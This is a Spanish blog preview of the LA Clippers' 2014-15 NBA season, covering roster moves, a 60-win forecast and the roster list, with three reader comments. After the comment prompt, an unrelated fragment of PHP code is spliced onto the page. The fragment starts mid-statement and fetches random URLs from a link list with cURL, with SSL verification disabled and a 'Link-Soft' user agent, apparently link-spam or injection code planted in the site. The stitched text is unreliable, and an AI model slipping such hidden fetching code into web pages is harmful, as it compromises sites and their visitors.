Los Angeles Clippers 2014-2015: La hora de la verdad

26 de October de 2014 por MagicJohnson32

Los Angeles Clippers, o cómo la mejor temporada en la historia de una franquicia puede resultar decepcionante. Las 57 victorias obtenidas en la 2013-2014 supusieron el quinto año consecutivo en el que el equipo mejoró su balance y el mejor porcentaje de triunfos jamás logrado por LAC. De nada sirvió, sin embargo, llegados los Playoffs, donde la segunda ronda fue nuevamente un obstáculo insalvable. Nunca han alcanzado los Clippers las finales de Conferencia y empiezan a acabarse las excusas: hay plantilla, hay entrenador y, por haber, hay hasta un propietario del que no sentir vergüenza. El verano, tan convulso como ha sido, deja al equipo en condiciones idóneas para probar que los L.A. Clippers deben ser considerados entre los principales candidatos al título.

griffin paul

Movimientos clave

Los Clippers se han movido bien para mejorar su plantilla, pero el cambio más trascendental ha sido en los despachos. Se ha hablado sobradamente de la marcha de Donald Sterling, propietario de la franquicia desde la campaña 1981-1982, y la compra por parte del ex mandamás de Microsoft Steve Ballmer, así que aquí nos centraremos en el terreno deportivo. Ahí, los movimientos han sido acertados aunque escasos, tal vez a causa de la tempestad que se vivía a raíz del caso Sterling. La adquisición del FA Spencer Hawes, con un contrato por cuatro temporadas y a cambio de la mid level, es una de las mejores noticias del verano para una plantilla excesivamente dependiente de la producción su dúo interior. Ofensivamente, Hawes mezclará perfectamente tanto con Griffin como con DeAndre Jordan, con lo que podrá ejercer de PF y de C. Lo veremos, como es característico en él, operando desde el poste alto, donde distribuirá juego y aprovechará las asistencias de Chris Paul para anotar en tiros librados. En defensa, sin embargo, apenas es una mejora sobre Glen Davis, quien ha renovado pero que verá su rol aún más reducido por la presencia de Hawes. La otra adquisición importante del verano ha sido Jordan Farmar, jugador de los Lakers en dos etapas (la más reciente, la temporada pasada) y que cambia de equipo sin siquiera cambiar de pabellón para suplir a Darren Collison como suplente de Chris Paul, un papel para el que Farmar está más que cualificado. Una de las sorpresas agradables de la temporada puede ser Chris Douglas-Roberts, que dejó buenos minutos en los Bobcats y se encuentra en los Clippers ante la oportunidad de ser incluso titular. Más difícil lo tendrán para disfrutar de minutos el resto de novedades de la plantilla, Ekpe Udoh y CJ Wilcox.

Qué esperamos de ellos

El proyecto de los Clippers ha alcanzado un punto en el que ya no vale una gran regular season, ni superar la primera ronda para caer de manera más o menos digna a continuación. Se da por seguro un magnífico balance a la conclusión de los 82 partidos de fase regular y no sería una sorpresa ver a los Clippers en lo más alto del Oeste, teniendo en cuenta la lesión de Durant y que Popovich reservará a los suyos para los Playoffs. Sin embargo, aunque ganen más de 60 partidos, lo que definirá la campaña de estos Clippers será su rendimiento en las series por el título, donde nunca han acabado de mostrarse como un equipo digno del anillo, con lagunas defensivas y una frustrante incapacidad de ganar sus partidos como local. Ahí, tras los progresos vistos el año pasado, es donde deberá notarse la labor de Doc Rivers en su segunda campaña al cargo del banquillo. El técnico, que ha ampliado su contrato y además ejerce de presidente, afronta el reto de encontrar remedios a los problemas ya conocidos y que no se han resuelto vía mercado. También cuentan con margen de mejora Griffin y Jordan pese a que vienen de firmar sus mejores campañas como profesionales. El ala-pívot ha demostrado que dispone de la capacidad de trabajo y la ambición para ser mejor cada año y uno de los alicientes de la temporada será comprobar hasta qué punto ha aumentado su arsenal. De ello depende en buena medida el éxito de este equipo, para el que ya nada que no sea unas finales de conferencia servirá.

Pronóstico

60 victorias, disputando el primer puesto del Oeste.

Plantilla

PG: Chris Paul, Jordan Farmar
SG: JJ Redick, Jamal Crawford, Reggie Bullock, CJ Wilcox
SF: Matt Barnes, Chris Douglas-Roberts, Hedo Turkoglu
PF: Blake Griffin, Glen Davis, Ekpe Udoh
C: DeAndre Jordan, Spencer Hawes

Bajas: Darren Collison (Sacramento), Danny Granger (Miami), Jared Dudley (Milwaukee), Willie Green (Orlando), Ryan Hollins (Sacramento) y BJ Mullens (Shanxi Zhongyu).

Comenta

3 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Yo es que veo un equipo donde en la rotación escolta-alero el único que puede dar la talla es Crawford, y ya sé que así no van a ganar un anillo…

      Citar

  2. Denise dice:
    #2

    Bueno, yo los 2 años anteriores he pensado que eran clarisimos candidatos al anillo, incluso a raiz de las adquisiciones de Glen Davis, Granger y Turkoglu en febrero, los veía como candidatos nº1 en el Oeste. Después de ver como no hacen nada en PO, he perdido total confianza en este equipo. Para mí la plantilla de este año es peor que la del año pasado, no ya porque las altas sean peores que las bajas, sino también por el curso natural del avance de la edad. También creo que les falta algún jugador con gen ganador.

    En la suplencia del PG, Farmar es un buen jugador que dará minutos de calidad en el descanso de Paul, pero ni mucho menos puede dar el rendimiento de Collison, cuyo rendimiento durante la baja de CP3 fue extraordinario.

    En las alas hay muchas carencias, primero defensivas, como tambiñen en cuanto profundidad. Tanto Crawaford y Barnes tendrán cerca de 35 años allá cuando el anillo se decida, mención especial para el alero, un ga¡randisimo jugador de equipo que a mi siempre me ha flipado, pero este año va a sufrir bastante porque está solo en el SF y le va a tocar bailar con la más fea noche tras noche.
    Al margen, el equipo no presenta ni un solo jugador del que puedas esperar una sorpresa agradable, ningun joven con el que entusiasmarse, quizás Reggie Bullock pero no espero demasiado. Del resto, solo Griffin y DeAndre puedan tener un ligero margen de mejora pero nada especial, por lo que la mejor versión de esta plantilla ya está vista.

    Harán PO y deberían ser cabezas de serie, pero creo que para ganar el anillo necesitarían algun traspaso y algún que otro jugador veterano con anillo mediante buyout que le de mas experiencia y un caracter mas competitivo y ganador en Playoffs.

      Citar

  3. TheDeerHunter dice:
    #3

    Es curioso lo que pasa en esta conferencia. La brutalidad de nivel que hay y sin embargo, quitando Spurs y, con reservas Thunder, parece que todo lo demás nos sabe a poco.
    Como sabéis para mí son un equipazo, empezando por el entrenador cuyo segundo año se tiene que notar. No`veo disminución de nivel, sino al contrario. Collison rindió muy bien porque es un buen base suplente, pero creo que Farmar también lo es y sinceramente no lo veo muy por debajo. Hawes me parece un lujazo.

    Dejó mal sabor de boca la eliminación contra Thunder y los problemas ante Warriors, pero es que estos son otros dos trasatlánticos. Durante todo el curso fallaron en defensa, sí, pero es que ningún rival del oeste se chupa el dedo y la hora de la verdad llegó en medio de la explosión del caso Sterling. Es algo que con total seguridad afectó a la concentración del equipo.

    A mí me parece que pueden ganar a cualquiera, aunque tampoco son superiores sobre el papel a algunos. No creo que estén moralmente obligados a llegar a la final de conferencia. Como dice el artículo este año se deberá medir realmente el proyecto.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>